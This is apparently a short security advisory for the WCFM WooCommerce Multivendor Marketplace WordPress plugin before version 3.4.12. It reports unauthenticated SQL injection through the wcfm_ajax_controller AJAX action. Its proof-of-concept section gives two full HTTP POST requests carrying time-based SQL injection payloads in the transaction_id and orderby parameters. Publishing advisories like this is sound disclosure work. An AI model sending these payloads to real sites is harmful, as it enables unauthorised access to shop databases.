WCFM - WooCommerce Multivendor Marketplace < 3.4.12 - Unauthenticated SQL Injection

The wcfm_ajax_controller AJAX action of the plugin, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections

PoC

v < 3.4.11 POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 109 action=wcfm_ajax_controller&controller;=wcfm-refund-requests&transaction;_id=1+union+select+1+and+sleep(10)-- v < 3.4.12 POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: [any authenticated user] Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 145 action=wcfm_ajax_controller&controller;=wcfm-refund-requests&transaction;_id=1&orderby;=ID%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20